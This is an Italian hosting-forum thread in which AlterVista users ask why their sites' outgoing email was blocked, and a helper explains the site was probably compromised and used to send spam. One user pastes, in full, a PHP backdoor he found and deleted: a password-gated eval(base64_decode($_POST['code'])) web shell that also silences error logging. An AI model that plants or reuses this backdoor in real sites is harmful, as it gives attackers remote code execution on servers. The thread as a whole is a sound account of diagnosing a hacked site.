Traffico email temporaneamente bloccato

Salve, da qualche settimana il sito non permette più l'invio di email;
mi sono accorto che avete inviato il seguente messaggio:

Traffico email temporaneamente bloccato

Gent. Webmaster,

durante le ultime 24h abbiamo rilevato un flusso anomalo di emails inviate dal tuo sito.
Questo può essere dovuto alla presenza nel tuo spazio web di applicativi (forum, blog, CMS...) affetti da problemi di sicurezza e utilizzati da terze parti per inviare spam.

ecc ecc

Ho verificato il tutto e non c'è alcun spam, vengono inviate solo delle email (circa una decina) principalmente il sabato per le formazioni del fantacalcio.
Ho cliccato sul link da coi inviato per la riattivazione entro 24 ore...ma nulla è successo....anzi mi è arrivata nuovamente la stessa segnalazione del blocco email.
Come posso risolvere il problema?

http://fcjonio.altervista.org/

Contatta gli amministratori del servizio e chiedi spiegazioni, se non dovessero risponderti passa ad un servizio esterno.

[saitfainder]

Negli ultimi due giorni dal tuo sito sono partite più di 1000 email, motivo per cui il sistema se le blocca automaticamente. Se la mail ti è arrivata due volte è perché dopo lo sblocco sei di nuovo nella stessa situazione.

Evidentemente ci sono delle mail in partenza dal tuo sito, magari qualche tipo di notifica di commenti o un form dei contatti.

Negli ultimi due giorni dal tuo sito sono partite più di 1000 email, motivo per cui il sistema se le blocca automaticamente. Se la mail ti è arrivata due volte è perché dopo lo sblocco sei di nuovo nella stessa situazione.

Evidentemente ci sono delle mail in partenza dal tuo sito, magari qualche tipo di notifica di commenti o un form dei contatti.

Intanto grazie per la risposta;
come faccio a capire da dove partono tutte queste email?
come posso risolvere il problema?
tutto funzionava normalmente fino a qualche settimana fa...da circa 3 anni....
può essere una soluzione cambiare la password ftp del sito?

[saitfainder]

Cambiare la password non è la soluzione se il sito è già stato compromesso. O meglio, va fatto per sperare di evitare problemi futuri, ma se la password è stata rubata una volta lo può essere ancora, quindi dovresti controllare con un buon antivirus tutti i pc che hanno accesso al sito.

Accedendo al tuo sito non sembrano esserci form mail da sfruttare, quindi o sono mail che partono da account spammosi dall'interno del tuo applicativo o sono stati inseriti degli script a tua insaputa. Sei in grado di distinguere quali script siano leciti e quali no? Per esempio quel sendmail.php nella cartella principale del sito e dal contenuto offuscato?

Cambiare la password non è la soluzione se il sito è già stato compromesso. O meglio, va fatto per sperare di evitare problemi futuri, ma se la password è stata rubata una volta lo può essere ancora, quindi dovresti controllare con un buon antivirus tutti i pc che hanno accesso al sito.

Accedendo al tuo sito non sembrano esserci form mail da sfruttare, quindi o sono mail che partono da account spammosi dall'interno del tuo applicativo o sono stati inseriti degli script a tua insaputa. Sei in grado di distinguere quali script siano leciti e quali no? Per esempio quel sendmail.php nella cartella principale del sito e dal contenuto offuscato?

il file sendmail.php dovrebbe essere apposto...in quanto è presente anche su un altro sito identico sul quale non ho problemi....mi sono accorto invece della presenza di diversi altri file .php che non dovrebbero esserci e che ho provveduto a cancellare...uno dei quali ad esempio conteneva questo:

?php@error_reporting(0);@ini_set("display_errors", 0);@ini_set("log_errors",0);@ini_set("error_log",0 );@ini_set("memory_limit", "128M");@ini_set("max_execution_time",30);@set_tim e_limit(30); if (isset($_POST["ip"])) $_SERVER["REMOTE_ADDR"] = $_POST["ip"];if (isset($_POST["code"]) && isset($_POST["pass"]) && $_POST["pass"] == "aewQ5ldwtxsLUfYWYVELV9RpHly08CKd"){ eval(base64_decode($_POST["code"]));}exit;?>

vediamo come va dopo aver cancellato questi file estranei...e ovviamente avendo cambiato la password ftp...
per pc aventi accesso al sito intendi ovviamente solo quelli che entrano per aggiornare il sito...giusto?
cmq adesso è nuovamente bloccato

salve anche io ho lo stesso problema NON PARTONO PIU EMAIL dal sito su dominio ALTERVISTA posso sapere cosa sta accadendo ?
grazie

[porrolambertenghi]

Ho un blog altervista da circa tre mesi http://porrolambertenghi.altervista.org/ ed è la seconda volta nel giro di 15 giorni che si blocca l'invio della newsletter. E' un blog di un comitato di quartiere e invio una newsletter a circa 100 utenti 2/3 volte a settimana utilizzando il plugin "MailPoet" (è comunque bloccato anche l'invio di mail con wordpress php) Si tratta di un blocco automatico? Grazie per la risposta.
Lorenzo